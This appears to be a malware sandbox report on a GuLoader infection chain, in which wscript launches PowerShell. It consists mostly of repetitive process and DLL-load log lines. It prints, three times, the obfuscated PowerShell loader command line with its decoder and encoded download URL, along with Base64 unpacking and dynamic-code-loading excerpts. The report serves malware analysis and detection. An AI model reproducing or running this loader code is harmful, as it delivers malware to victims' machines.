              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1838938605.0000000006E0D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000004.00000002.1850125168.000000000B27C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1849801435.0000000008250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Tilbagevisningerne)$global:Patronise = [System.Text.Encoding]::ASCII.GetString($Smokes)$global:Jomsviking=$Patronise.substring($Suffragette,$Fljl)<#Perspirable Batikfarvningerne Caye
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((spgende $Myel $epiteters), (Unstaged @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:skaberglden = [AppDomain]::CurrentDomain.GetAssemblies()$global:Prdisp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dendrologiens)), $Digitalissens).DefineDynamicModule($Epibatholithic, $false).DefineType($Loupe, $Unbooklearned, [System.MulticastDele
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Tilbagevisningerne)$global:Patronise = [System.Text.Encoding]::ASCII.GetString($Smokes)$global:Jomsviking=$Patronise.substring($Suffragette,$Fljl)<#Perspirable Batikfarvningerne Caye
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$SJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C502FD push ds; iretd 2_2_00007FF886C503E2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C50CC4 push ds; iretd 2_2_00007FF886C50CCA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C51039 pushad ; iretd 2_2_00007FF886C5103A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886D24E9D push ebx; ret 2_2_00007FF886D24F5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_042F449D push cs; retf 4_2_042F4532
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_042F472D push ds; retf 4_2_042F4732
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_042F473D push ds; retf 4_2_042F4742
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06ED2AF6 pushad ; iretd 4_2_06ED2B00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06EDEAAB pushad ; iretd 4_2_06EDEAAC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06EDEA99 pushad ; iretd 4_2_06EDEAA3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06ED2B08 pushad ; iretd 4_2_06ED2B09
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
